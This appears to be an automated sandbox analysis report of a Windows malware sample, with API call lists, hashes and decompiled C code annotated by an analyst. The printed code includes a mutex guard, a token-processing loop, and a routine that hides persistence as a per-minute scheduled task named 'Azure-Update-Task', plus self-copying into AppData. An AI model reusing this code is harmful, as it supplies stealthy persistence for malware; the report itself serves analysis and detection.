                                                                                                                                                                                          • CopyFileExW.KERNEL32(00422294,00422258,00000000,00000000,00000000,00000000), ref: 0041A057
                                                                                                                                                                                          • WritePrivateProfileStringA.KERNEL32(004222FC,004222E0,004222C8,004222C0), ref: 0041A071
                                                                                                                                                                                          Strings
                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                          • Source File: 0000000B.00000002.435969792.0000000000406000.00000020.00020000.sdmp, Offset: 00406000, based on PE: false
                                                                                                                                                                                          Similarity
                                                                                                                                                                                          • API ID: File$Profile$Create$ErrorFindLastPrivateStringThreadTime$HeapInfoResourceWrite$AddressAliasAtomBinaryCommCommandCompletionConsoleContextCopyDecrementDestroyEnumEnvironmentExesFormatFreeHandleIdealInterlockedLanguagesLengthLineLocalLocaleModuleMutexNameNamedNextNumberOpenPipePortProcProcessorProtectSemaphoreShortStartupStateStringsSystemTypeUnlockUnregisterVirtualWaitWalk_memsetlstrlen
                                                                                                                                                                                          • String ID: ";$$.$&Pc$Pc$ficizulagavigajenum
                                                                                                                                                                                          • API String ID: 3387768851-811891720
                                                                                                                                                                                          • Opcode ID: 8e24c779774c676a34fd6a690cea4a60bf48acd946fd07b48fd3186c041d7cdf
                                                                                                                                                                                          • Instruction ID: f31b9a8bc7d1aa8fd04b4e2830f0ca4a4d395b920a6dc1273bc76c120149c905
                                                                                                                                                                                          • Opcode Fuzzy Hash: 8e24c779774c676a34fd6a690cea4a60bf48acd946fd07b48fd3186c041d7cdf
                                                                                                                                                                                          • Instruction Fuzzy Hash: B1B17334A84314EBDB249F60ED56BE977B0FB04705F1084AAE209662C0C7B81EC5DF9E
                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                          Uniqueness Score: -1.00%

C-Code - Quality: 100%
			_entry_() {
				WCHAR* _v8;
				void* _v12;
				signed int _v16;
				signed short* _v20;
				signed int _v24;
				long _v28;
				WCHAR* _t38;
				long _t40;
				signed short _t43;
				signed int _t48;
				signed int _t50;
				signed short* _t51;
				signed int _t52;
				signed int _t60;
				void* _t61;
				short _t63;
				WCHAR* _t65;
				signed short _t71;
				void* _t76;
				signed int _t78;

				E00401000(); // executed
				CreateMutexW(0, 0, L"0N1Y/53R10U5/BU51N355"); // executed; named mutex used as a single-instance guard
				if(GetLastError() == 0xb7) { // 0xb7 == ERROR_ALREADY_EXISTS: another instance already holds the mutex
					ExitProcess(0); // executed
				}
				E00401272(); // executed
				_t76 = _v28;
				while(1) { // main loop: fetch a string, split it into whitespace-delimited tokens, process each token
					_t38 = E00401B3B();
					_t63 = 0;
					_v8 = _t38;
					if(_t38 == 0) {
						goto L23;
					}
					_t3 = lstrlenW(_t38) + 1; // 0x1
					_t40 = _t3 + _t3; // byte size of the wide string including the terminator
					_v28 = _t40;
					_v12 = LocalAlloc(0x40, _t40); // LMEM_FIXED | LMEM_ZEROINIT
					E00401418(_t41, _t77, _v8);
					_t65 = _v8;
					_t78 = 0;
					_v16 = _v16 & 0;
					_t43 =  *_t65 & 0x0000ffff;
					_t71 = _t43;
					if(_t43 == 0) {
						L22:
						E00401AD7(_v12, lstrlenW(_v12));
						LocalFree(_v12);
					} else {
						_v20 = _t65;
						do {
							_v24 = _t71 & 0x0000ffff;
							_t48 = _t71 & 0x0000ffff;
							// token delimiters: LF (0xa), 0xa0d, CR (0xd), space (0x20), tab (9)
							if(_t48 == 0xa || _t48 == 0xa0d || _t48 == 0xd || _t48 == 0x20 || _t48 == 9) {
								if(_t63 != 0) { // a token is open: terminate it and hand it off
									 *(_t76 + _t78 * 2) = 0;
									_t63 = 0;
									E0040147D( &_v12, _t76);
									if(_t76 != 0) {
										LocalFree(_t76);
									}
									_t65 = _v8;
								}
							} else {
								_t60 = _v24 & 0x0000ffff;
								if(_t63 == 0) { // first character of a new token: allocate its buffer
									_t61 = LocalAlloc(0x40, _v28);
									_t65 = _v8;
									_t76 = _t61;
									_t63 = _t63 + 1;
									_t78 = 0;
									_t60 =  *_v20 & 0x0000ffff;
								}
								 *(_t76 + _t78 * 2) = _t60; // append the character to the current token
								_t78 = _t78 + 1;
							}
							_t50 = _v16 + 1;
							_v16 = _t50;
							_t51 =  &(_t65[_t50]);
							_v20 = _t51;
							_t52 =  *_t51 & 0x0000ffff;
							_t71 = _t52;
						} while (_t52 != 0);
						if(_t63 != 0) { // flush the trailing token when the string ends without a delimiter
							 *((short*)(_t76 + lstrlenW(_t76) * 2)) = 0;
							E0040147D( &_v12, _t76);
							if(_t76 != 0) {
								LocalFree(_t76);
							}
						}
						goto L22;
					}
					L23:
					Sleep(0xe1); // 0xe1 == 225 ms between iterations
				}
			}
                                                                                                                                                                                          0x00401cd0
                                                                                                                                                                                          0x00401c01
                                                                                                                                                                                          0x00401c01
                                                                                                                                                                                          0x00401c04
                                                                                                                                                                                          0x00401c07
                                                                                                                                                                                          0x00401c0a
                                                                                                                                                                                          0x00401c10
                                                                                                                                                                                          0x00401c57
                                                                                                                                                                                          0x00401c60
                                                                                                                                                                                          0x00401c64
                                                                                                                                                                                          0x00401c66
                                                                                                                                                                                          0x00401c6d
                                                                                                                                                                                          0x00401c70
                                                                                                                                                                                          0x00401c70
                                                                                                                                                                                          0x00401c76
                                                                                                                                                                                          0x00401c76
                                                                                                                                                                                          0x00401c2b
                                                                                                                                                                                          0x00401c2e
                                                                                                                                                                                          0x00401c33
                                                                                                                                                                                          0x00401c3a
                                                                                                                                                                                          0x00401c40
                                                                                                                                                                                          0x00401c43
                                                                                                                                                                                          0x00401c48
                                                                                                                                                                                          0x00401c49
                                                                                                                                                                                          0x00401c4b
                                                                                                                                                                                          0x00401c4b
                                                                                                                                                                                          0x00401c4e
                                                                                                                                                                                          0x00401c52
                                                                                                                                                                                          0x00401c52
                                                                                                                                                                                          0x00401c7c
                                                                                                                                                                                          0x00401c7d
                                                                                                                                                                                          0x00401c80
                                                                                                                                                                                          0x00401c83
                                                                                                                                                                                          0x00401c86
                                                                                                                                                                                          0x00401c89
                                                                                                                                                                                          0x00401c8b
                                                                                                                                                                                          0x00401c96
                                                                                                                                                                                          0x00401ca3
                                                                                                                                                                                          0x00401caa
                                                                                                                                                                                          0x00401cb1
                                                                                                                                                                                          0x00401cb4
                                                                                                                                                                                          0x00401cb4
                                                                                                                                                                                          0x00401cb1
                                                                                                                                                                                          0x00000000
                                                                                                                                                                                          0x00401c96
                                                                                                                                                                                          0x00401cd6
                                                                                                                                                                                          0x00401cdb
                                                                                                                                                                                          0x00401cdb

APIs
  • Part of subcall function 00401000: LoadLibraryW.KERNEL32(kernel32.dll,00401B85), ref: 0040100B
  • Part of subcall function 00401000: GetProcAddress.KERNEL32(00000000,LoadLibraryW), ref: 0040102B
  • Part of subcall function 00401000: LoadLibraryW.KERNEL32(ntdll.dll), ref: 00401041
  • Part of subcall function 00401000: LoadLibraryW.KERNEL32(Shell32.dll), ref: 0040104F
  • Part of subcall function 00401000: LoadLibraryW.KERNELBASE(Ole32.dll), ref: 0040105C
  • Part of subcall function 00401000: LoadLibraryW.KERNEL32(User32.dll), ref: 00401069
  • Part of subcall function 00401000: LoadLibraryW.KERNEL32(Ole32.dll), ref: 00401077
  • Part of subcall function 00401000: GetProcAddress.KERNEL32(?,GetProcAddress), ref: 00401085
  • Part of subcall function 00401000: GetProcAddress.KERNEL32(?,CreateDirectoryW), ref: 004010A2
  • Part of subcall function 00401000: GetProcAddress.KERNEL32(?,GlobalAlloc), ref: 004010B3
  • Part of subcall function 00401000: GetProcAddress.KERNEL32(?,GlobalFree), ref: 004010C4
  • Part of subcall function 00401000: GetProcAddress.KERNEL32(?,GlobalLock), ref: 004010D5
  • Part of subcall function 00401000: GetProcAddress.KERNEL32(?,GlobalUnlock), ref: 004010E6
  • Part of subcall function 00401000: GetProcAddress.KERNEL32(?,LocalAlloc), ref: 004010F7
  • Part of subcall function 00401000: GetProcAddress.KERNEL32(?,LocalFree), ref: 00401108
  • Part of subcall function 00401000: GetProcAddress.KERNEL32(?,lstrlenW), ref: 00401119
  • Part of subcall function 00401000: GetProcAddress.KERNEL32(?,StrChrW), ref: 0040112D
  • Part of subcall function 00401000: GetProcAddress.KERNEL32(?,StrStrW), ref: 0040113E
  • Part of subcall function 00401000: GetProcAddress.KERNEL32(?,StrStrIW), ref: 0040114F
  • Part of subcall function 00401000: GetProcAddress.KERNEL32(?,StrToIntExW), ref: 0040115B
  • Part of subcall function 00401000: GetProcAddress.KERNEL32(?,PathIsDirectoryW), ref: 00401167
  • Part of subcall function 00401000: GetProcAddress.KERNEL32(00000000,CoInitialize), ref: 00401178
  • Part of subcall function 00401000: GetProcAddress.KERNEL32(?,HeapFree), ref: 00401187
• CreateMutexW.KERNELBASE(00000000,00000000,0N1Y/53R10U5/BU51N355), ref: 00401B8E
• GetLastError.KERNEL32 ref: 00401B94
• ExitProcess.KERNEL32 ref: 00401BA3
• lstrlenW.KERNEL32(00000000), ref: 00401BC4
• LocalAlloc.KERNEL32(00000040,00000000), ref: 00401BD6
• LocalAlloc.KERNEL32(00000040,?,?), ref: 00401C3A
• lstrlenW.KERNEL32(?,?), ref: 00401C99
• LocalFree.KERNEL32(?), ref: 00401CB4
• lstrlenW.KERNEL32(?,?), ref: 00401CBD
• LocalFree.KERNEL32(?), ref: 00401CD0
• Sleep.KERNEL32(000000E1), ref: 00401CDB
Strings
Memory Dump Source
• Source File: 0000000B.00000002.435951957.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true
Yara matches
Similarity
• API ID: AddressProc$LibraryLoad$Local$lstrlen$AllocFree$CreateErrorExitLastMutexProcessSleep
• String ID: 0N1Y/53R10U5/BU51N355
• API String ID: 3526352376-679787619
• Opcode ID: abfc3147e3cb7d637de4c45283e930422affb3ed23b42ad849e5f8596596f60e
• Instruction ID: 3f012f2a931f3eda7aefcabd98cb6df1364c243eae3826966493d824e6423c12
• Opcode Fuzzy Hash: abfc3147e3cb7d637de4c45283e930422affb3ed23b42ad849e5f8596596f60e
• Instruction Fuzzy Hash: 7341B4749402159BDB11AFA5D984A7EBBB5BF88301F10007AE642F32F0DB38DD41DB58
Uniqueness

Uniqueness Score: -1.00%

C-Code - Quality: 100%
#include <windows.h>
#include <string.h>

/* Analyst annotation: E00401D7C is the sample's own string-append helper
   (appends a wide string to the LocalAlloc'd buffer held in *buf). */
void E00401D7C(void** buf, const wchar_t* str);

/* Persistence routine (matches the "Uses schtasks.exe or at.exe to add and modify
   task schedules" signature): runs schtasks.exe to register a task named
   "Azure-Update-Task" that re-launches the path passed in __ecx every minute. */
int E00401339(void* __ecx, void* __eflags) {
	void* _v8;
	struct _PROCESS_INFORMATION _v24;
	struct _STARTUPINFOW _v92;
	int _t28;
	int _t49;
	void* _t50;
	void* _t51;

	_t49 = 0x44;                               /* sizeof(STARTUPINFOW) */
	_t51 = __ecx;                              /* path of the binary to persist */
	memset( &_v92, 0, _t49);
	_v92.cb = _t49;
	memset( &_v24, 0, 0x10);
	_v8 = LocalAlloc(0x40, 0x308);             /* LPTR: zero-initialised command-line buffer */
	/* Builds: /C /create /F /sc minute /mo 1 /tn "Azure-Update-Task" /tr "<path>" */
	E00401D7C( &_v8, L"/C /create /F /sc minute /mo 1 /tn \""); // executed
	E00401D7C( &_v8, L"Azure-Update-Task");
	E00401D7C( &_v8, L"\" /tr \"");
	E00401D7C( &_v8, (const wchar_t*)_t51);
	E00401D7C( &_v8, L"\"");                   /* decompiler emitted a narrow "\"" here; the helper takes wide strings */
	_t50 = _v8;
	/* 0x8000000 = CREATE_NO_WINDOW, so no console appears for schtasks.exe */
	_t28 = CreateProcessW(L"C:\\Windows\\System32\\schtasks.exe", _t50, 0, 0, 0, 0x8000000, 0, 0,  &_v92,  &_v24); // executed
	if(_t28 != 0) {
		WaitForSingleObject(_v24.hProcess, 0xffffffff);
		CloseHandle(_v24.hProcess);            /* decompiler passed the whole struct; the process handle is meant */
		CloseHandle(_v24.hThread);
		if(_t50 != 0) {
			LocalFree(_t50);
		}
		return 1;
	}
	if(_t50 != 0) {
		LocalFree(_t50);
	}
	return 0;
}










Instruction addresses (one per decompiled statement above; 0x00000000 marks a statement with no address): 0x00401344 0x0040134d 0x0040134f 0x0040135a 0x0040135f 0x0040137a 0x00401380 0x0040138d 0x0040139a 0x004013a4 0x004013b1 0x004013b6 0x004013d1 0x004013d9 0x004013ef 0x004013fe 0x00401403 0x00401407 0x0040140a 0x0040140a 0x00000000 0x00401412 0x004013dd 0x004013e0 0x004013e0 0x00000000

                                                                                                                                                                                          APIs
                                                                                                                                                                                          • memset.NTDLL ref: 0040134F
                                                                                                                                                                                          • memset.NTDLL ref: 0040135F
                                                                                                                                                                                          • LocalAlloc.KERNEL32(00000040,00000308), ref: 0040136F
                                                                                                                                                                                            • Part of subcall function 00401D7C: lstrlenW.KERNEL32(?,00000044,?,00000000,?,?,?,00401385), ref: 00401D92
                                                                                                                                                                                            • Part of subcall function 00401D7C: lstrlenW.KERNEL32(/C /create /F /sc minute /mo 1 /tn ",00000044,?,00000000,?,?,?,00401385), ref: 00401D9F
                                                                                                                                                                                            • Part of subcall function 00401D7C: LocalAlloc.KERNEL32(00000040,00000001,?,00401385), ref: 00401DB0
                                                                                                                                                                                            • Part of subcall function 00401D7C: GlobalFree.KERNEL32 ref: 00401DD1
                                                                                                                                                                                          • CreateProcessW.KERNELBASE ref: 004013D1
                                                                                                                                                                                          • LocalFree.KERNEL32(?), ref: 004013E0
                                                                                                                                                                                          • WaitForSingleObject.KERNEL32(?,000000FF), ref: 004013EF
                                                                                                                                                                                          • CloseHandle.KERNEL32(?), ref: 004013FE
                                                                                                                                                                                          • CloseHandle.KERNEL32(?), ref: 00401403
                                                                                                                                                                                          • LocalFree.KERNEL32(?), ref: 0040140A
                                                                                                                                                                                          Strings
                                                                                                                                                                                          • " /tr ", xrefs: 00401392
                                                                                                                                                                                          • Azure-Update-Task, xrefs: 00401385
                                                                                                                                                                                          • /C /create /F /sc minute /mo 1 /tn ", xrefs: 00401375
                                                                                                                                                                                          • C:\Windows\System32\schtasks.exe, xrefs: 004013CC
                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                          • Source File: 0000000B.00000002.435951957.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                          Yara matches
                                                                                                                                                                                          Similarity
                                                                                                                                                                                          • API ID: Local$Free$AllocCloseHandlelstrlenmemset$CreateGlobalObjectProcessSingleWait
                                                                                                                                                                                          • String ID: " /tr "$/C /create /F /sc minute /mo 1 /tn "$Azure-Update-Task$C:\Windows\System32\schtasks.exe
                                                                                                                                                                                          • API String ID: 2873265511-3368035720
                                                                                                                                                                                          • Opcode ID: 1ec7269c68737af2b38322868ed3762ec80b395895a701cf05524ec3fdf00e48
                                                                                                                                                                                          • Instruction ID: 866b7d2ddefd7e492dcfc638dded416843d2f37144fb2dfd60a26f3a44d98789
                                                                                                                                                                                          • Opcode Fuzzy Hash: 1ec7269c68737af2b38322868ed3762ec80b395895a701cf05524ec3fdf00e48
                                                                                                                                                                                          • Instruction Fuzzy Hash: 7C2192B1900109AFD710EFA5DD85EAF7B7CEF8475AF200036B601B61E4DB745E008A68
                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                          APIs
                                                                                                                                                                                          • VirtualAlloc.KERNELBASE(00000000,?,00001000,00000004), ref: 02C6024D
                                                                                                                                                                                          Strings
                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                          • Source File: 0000000B.00000002.436398329.0000000002C60000.00000040.00000001.sdmp, Offset: 02C60000, based on PE: false
                                                                                                                                                                                          Yara matches
                                                                                                                                                                                          Similarity
                                                                                                                                                                                          • API ID: AllocVirtual
                                                                                                                                                                                          • String ID: cess$kernel32.dll
                                                                                                                                                                                          • API String ID: 4275171209-1230238691
                                                                                                                                                                                          • Opcode ID: 1bc5c981d6fea912fcc7dcc340e60fde74e519195c6ec5c7e407c243dd4fdd56
                                                                                                                                                                                          • Instruction ID: 751fb6d7ad82fa6ada8a52c97ba949136f1f036daebde48c75e9f8c067353c80
                                                                                                                                                                                          • Opcode Fuzzy Hash: 1bc5c981d6fea912fcc7dcc340e60fde74e519195c6ec5c7e407c243dd4fdd56
                                                                                                                                                                                          • Instruction Fuzzy Hash: 32525974A01229DFDB64CF68C985BACBBB1BF09304F1480D9E94DAB351DB30AA85DF15
                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                          C-Code - Quality: 87%
			E00401D7C(WCHAR** __ecx, WCHAR* __edx) {
				// Appends the wide string __edx to the heap string held at *__ecx, allocating a
				// larger buffer and releasing the previous one. The caller at 0x00401344 uses it
				// to assemble the schtasks /create command line fragment by fragment.
				signed int _v8;
				WCHAR* _v12;
				signed int _t10;
				WCHAR* _t20;
				void* _t21;
				int _t30;
				signed int _t31;
				void** _t34;

				_push(__ecx);
				_push(__ecx);
				_t34 = __ecx;
				_t20 = __edx;
				_v12 = __edx;
				if( *__ecx == 0) {                      // no string accumulated yet
					_t30 = 0;
				} else {
					_t30 = lstrlenW( *__ecx);            // current length in WCHARs
				}
				_t10 = lstrlenW(_t20) + 1 + _t30;       // old + new + terminator, in WCHARs
				_v8 = _t10;
				_t21 = LocalAlloc(0x40, _t10 + _t10);   // LPTR (zero-initialised); size is in bytes
				_t31 = _v8;
				if(_t30 != 0) {
					E00401418(_t21, _t31,  *_t34);      // presumably copies the old string into the new buffer (body not shown here)
				}
				if( *_t34 != 0) {
					GlobalFree( *_t34); // executed     // releases the old buffer; mismatched with LocalAlloc, but both map to the process heap
				}
				E00401CE6(_t21, _t31, _v12);            // presumably appends __edx (body not shown here)
				 *_t34 = _t21;
				 *((short*)(_t21 + _t31 * 2 - 2)) = 0;  // NUL-terminate the last WCHAR of the new buffer
				return 1;
			}
Instruction addresses (one per decompiled statement above): 0x00401d7f 0x00401d80 0x00401d83 0x00401d85 0x00401d88 0x00401d8e 0x00401d9c 0x00401d90 0x00401d98 0x00401d98 0x00401da6 0x00401da8 0x00401db8 0x00401dba 0x00401dbd 0x00401dc5 0x00401dc5 0x00401dcd 0x00401dd1 0x00401dd1 0x00401dde 0x00401de5 0x00401de7 0x00401df1

                                                                                                                                                                                          APIs
                                                                                                                                                                                          • lstrlenW.KERNEL32(?,00000044,?,00000000,?,?,?,00401385), ref: 00401D92
                                                                                                                                                                                          • lstrlenW.KERNEL32(/C /create /F /sc minute /mo 1 /tn ",00000044,?,00000000,?,?,?,00401385), ref: 00401D9F
                                                                                                                                                                                          • LocalAlloc.KERNEL32(00000040,00000001,?,00401385), ref: 00401DB0
                                                                                                                                                                                          • GlobalFree.KERNEL32 ref: 00401DD1
                                                                                                                                                                                          Strings
                                                                                                                                                                                          • /C /create /F /sc minute /mo 1 /tn ", xrefs: 00401D9E
                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                          • Source File: 0000000B.00000002.435951957.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                          Yara matches
                                                                                                                                                                                          Similarity
                                                                                                                                                                                          • API ID: lstrlen$AllocFreeGlobalLocal
                                                                                                                                                                                          • String ID: /C /create /F /sc minute /mo 1 /tn "
                                                                                                                                                                                          • API String ID: 3873415381-4285889591
                                                                                                                                                                                          • Opcode ID: 587df80eb51c2a01ab4461f8c379014ae1cc834c61983a62516beef9a75456fa
                                                                                                                                                                                          • Instruction ID: e4eeb56db1f359d191c916dc7992aa8b087273442978b1b4ad4c4756f7a4d6b6
                                                                                                                                                                                          • Opcode Fuzzy Hash: 587df80eb51c2a01ab4461f8c379014ae1cc834c61983a62516beef9a75456fa
                                                                                                                                                                                          • Instruction Fuzzy Hash: 6D017175610205AFD7105FA9DC45A6ABAFAEFD4311F24443EA282F32B1DAB89C418664
                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                          APIs
                                                                                                                                                                                          • GetModuleHandleA.KERNEL32(00421E1C), ref: 0041937E
                                                                                                                                                                                          • GetProcAddress.KERNEL32(02B77404,00435578), ref: 00419430
                                                                                                                                                                                          • VirtualProtect.KERNELBASE(02B6F54C,02B77B00,00000040,?), ref: 00419450
                                                                                                                                                                                          Strings
                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                          • Source File: 0000000B.00000002.435969792.0000000000406000.00000020.00020000.sdmp, Offset: 00406000, based on PE: false
                                                                                                                                                                                          Similarity
                                                                                                                                                                                          • API ID: AddressHandleModuleProcProtectVirtual
                                                                                                                                                                                          • String ID: @
                                                                                                                                                                                          • API String ID: 2099061454-2766056989
                                                                                                                                                                                          • Opcode ID: 2ad12357a522cef60bd112afa0d5295fed7f52de05462541a459c876ddfa2d6e
                                                                                                                                                                                          • Instruction ID: d9ae2ebe879e639c4e3b926cec9c7d8b58d644c20bdcb63d04e190339fc0cd6f
                                                                                                                                                                                          • Opcode Fuzzy Hash: 2ad12357a522cef60bd112afa0d5295fed7f52de05462541a459c876ddfa2d6e
                                                                                                                                                                                          • Instruction Fuzzy Hash: 32216D21908AC0FED302CB7CFD5862A3FA74326244F0866B9D495472BFC6792118DB7E
                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                          APIs
                                                                                                                                                                                          • SetErrorMode.KERNELBASE(00000400,?,?,02C60223,?,?), ref: 02C60E02
                                                                                                                                                                                          • SetErrorMode.KERNELBASE(00000000,?,?,02C60223,?,?), ref: 02C60E07
                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                          • Source File: 0000000B.00000002.436398329.0000000002C60000.00000040.00000001.sdmp, Offset: 02C60000, based on PE: false
                                                                                                                                                                                          Yara matches
                                                                                                                                                                                          Similarity
                                                                                                                                                                                          • API ID: ErrorMode
                                                                                                                                                                                          • String ID:
                                                                                                                                                                                          • API String ID: 2340568224-0
                                                                                                                                                                                          • Opcode ID: 027e3930a8fc815aeaa48c4a19c17906f2e2d358c6b73c72f02d274321b10a64
                                                                                                                                                                                          • Instruction ID: c24a7c79a3cdb0739b6b7fca210df49940037ef47a0b32523d1896d70317d918
                                                                                                                                                                                          • Opcode Fuzzy Hash: 027e3930a8fc815aeaa48c4a19c17906f2e2d358c6b73c72f02d274321b10a64
                                                                                                                                                                                          • Instruction Fuzzy Hash: E2D0123114512C77D7002AD4DC0DBDD7B1C9F05B6AF008051FB0DE9181C7709A4046E5
                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                          APIs
                                                                                                                                                                                          • RtlEncodePointer.NTDLL(00000000), ref: 00409307
                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                          • Source File: 0000000B.00000002.435969792.0000000000406000.00000020.00020000.sdmp, Offset: 00406000, based on PE: false
                                                                                                                                                                                          Similarity
                                                                                                                                                                                          • API ID: EncodePointer
                                                                                                                                                                                          • String ID:
                                                                                                                                                                                          • API String ID: 2118026453-0
                                                                                                                                                                                          • Opcode ID: 290b8e1962c91982bf8375fc283ed684609ad00eaa07a203bd0aa917c7852488
                                                                                                                                                                                          • Instruction ID: 555c3cc75909235c463f038e69d95b8845f3c7525ef100fa5f3fbbce69837220
                                                                                                                                                                                          • Opcode Fuzzy Hash: 290b8e1962c91982bf8375fc283ed684609ad00eaa07a203bd0aa917c7852488
                                                                                                                                                                                          • Instruction Fuzzy Hash: 6BA01132088388A3C2002282A80AB823E0CC3C8A32F000020F22C020808AA2A80080AA
                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                          APIs
                                                                                                                                                                                          • TerminateProcess.KERNELBASE(000000FF,00000000), ref: 02C60929
                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                          • Source File: 0000000B.00000002.436398329.0000000002C60000.00000040.00000001.sdmp, Offset: 02C60000, based on PE: false
                                                                                                                                                                                          Yara matches
                                                                                                                                                                                          Similarity
                                                                                                                                                                                          • API ID: ProcessTerminate
                                                                                                                                                                                          • String ID:
                                                                                                                                                                                          • API String ID: 560597551-0
                                                                                                                                                                                          • Opcode ID: a112e37ccacacf0a755694005ce2d4fb1995a77917544b0a2f7eebedcae688b6
                                                                                                                                                                                          • Instruction ID: c8e6868aba343cae360140c5b3bd850b99d9938bbc1dc198fca96fadd5918fc5
                                                                                                                                                                                          • Opcode Fuzzy Hash: a112e37ccacacf0a755694005ce2d4fb1995a77917544b0a2f7eebedcae688b6
                                                                                                                                                                                          • Instruction Fuzzy Hash: B69002B024415021D820259C0C01B0500052751634F304710B130BA6D4D84096000115
                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                          APIs
                                                                                                                                                                                          • GlobalAlloc.KERNELBASE(00000000,02B77B00), ref: 0041933B
                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                          • Source File: 0000000B.00000002.435969792.0000000000406000.00000020.00020000.sdmp, Offset: 00406000, based on PE: false
                                                                                                                                                                                          Similarity
                                                                                                                                                                                          • API ID: AllocGlobal
                                                                                                                                                                                          • String ID:
                                                                                                                                                                                          • API String ID: 3761449716-0
                                                                                                                                                                                          • Opcode ID: 1aab901deb91e4522476e3ed4ad7919861da94ef2ec11d9425b62cd5ec64c2eb
                                                                                                                                                                                          • Instruction ID: 8e3655ca648fa178d482b9bc68af4478a5255a32ede4fed7c8bcd03305e8ef34
                                                                                                                                                                                          • Opcode Fuzzy Hash: 1aab901deb91e4522476e3ed4ad7919861da94ef2ec11d9425b62cd5ec64c2eb
                                                                                                                                                                                          • Instruction Fuzzy Hash: CCC04C759953085FD2109B95B859B2177ACE348641F004415E50983651D66068148E55
                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                          Non-executed Functions

                                                                                                                                                                                          APIs
                                                                                                                                                                                          • GetLastError.KERNEL32 ref: 00419A0C
                                                                                                                                                                                          • GetPrivateProfileIntW.KERNEL32(00421E80,00421E70,00000000,00421E30), ref: 00419A2C
                                                                                                                                                                                          • GetLastError.KERNEL32 ref: 00419A32
                                                                                                                                                                                          • GetNumberFormatA.KERNEL32(00000000,00000000,00421E90,00000000,?,00000000), ref: 00419A58
                                                                                                                                                                                          • GetCPInfoExW.KERNEL32(00000000,00000000,?), ref: 00419A69
                                                                                                                                                                                          • GetCommandLineW.KERNEL32 ref: 00419A6F
                                                                                                                                                                                          • GetStartupInfoA.KERNEL32(00000000), ref: 00419A77
                                                                                                                                                                                          • SetFileShortNameA.KERNEL32(00000000,00000000), ref: 00419A81
                                                                                                                                                                                          • CreateNamedPipeA.KERNEL32(00421EB0,00000000,00000000,00000000,00000000,00000000,00000000,00000000), ref: 00419AF1
                                                                                                                                                                                          • GetBinaryType.KERNEL32(00421ED0,?), ref: 00419B49
                                                                                                                                                                                          • HeapDestroy.KERNEL32(00000000), ref: 00419B51
                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                          • Source File: 0000000B.00000002.435969792.0000000000406000.00000020.00020000.sdmp, Offset: 00406000, based on PE: false
                                                                                                                                                                                          Similarity
                                                                                                                                                                                          • API ID: ErrorInfoLast$BinaryCommandCreateDestroyFileFormatHeapLineNameNamedNumberPipePrivateProfileShortStartupType
                                                                                                                                                                                          • String ID:
                                                                                                                                                                                          • API String ID: 3242046743-0
                                                                                                                                                                                          • Opcode ID: 7c5cb30a4695b971b029f1528554ae09b201add16f0ae535992b7a0b0ca3f754
                                                                                                                                                                                          • Instruction ID: 01657f5c00476ba7faca39b10de3ba90de21ef6b07a221bae3b0a22fecd08fed
                                                                                                                                                                                          • Opcode Fuzzy Hash: 7c5cb30a4695b971b029f1528554ae09b201add16f0ae535992b7a0b0ca3f754
                                                                                                                                                                                          • Instruction Fuzzy Hash: 3A31B070A44214DFE720DF90EC29BE97B71FB48349F1082AAF10566190CBB92D98DF1E
                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                          APIs
                                                                                                                                                                                          • GetModuleFileNameW.KERNEL32(00000000,?,00000104), ref: 02C614DB
                                                                                                                                                                                          • SHGetFolderPathW.SHELL32(00000000,0000001A,00000000,00000000,?), ref: 02C614ED
                                                                                                                                                                                          • PathAppendW.SHLWAPI(?,0040391C), ref: 02C61503
                                                                                                                                                                                          • PathIsDirectoryW.SHLWAPI(?), ref: 02C61510
                                                                                                                                                                                          • CreateDirectoryW.KERNEL32(?,00000000), ref: 02C61522
                                                                                                                                                                                          • PathAppendW.SHLWAPI(?,00403944), ref: 02C61534
                                                                                                                                                                                          • StrStrW.SHLWAPI(?,?), ref: 02C61548
                                                                                                                                                                                          • CopyFileW.KERNEL32(?,?,00000000), ref: 02C6156F
                                                                                                                                                                                          • ExitProcess.KERNEL32 ref: 02C61582
                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                          • Source File: 0000000B.00000002.436398329.0000000002C60000.00000040.00000001.sdmp, Offset: 02C60000, based on PE: false
                                                                                                                                                                                          Yara matches
                                                                                                                                                                                          Similarity
                                                                                                                                                                                          • API ID: Path$AppendDirectoryFile$CopyCreateExitFolderModuleNameProcess
                                                                                                                                                                                          • String ID:
                                                                                                                                                                                          • API String ID: 3994694214-0
                                                                                                                                                                                          • Opcode ID: ef3b43e0bf257aa2203ea887fd2ae442e103df6aa474e8697a45c816f97d1015
                                                                                                                                                                                          • Instruction ID: 3de5a8549df4787d0cf27699b133264310d9f886743f6be2798c4c73239cdb56
                                                                                                                                                                                          • Opcode Fuzzy Hash: ef3b43e0bf257aa2203ea887fd2ae442e103df6aa474e8697a45c816f97d1015
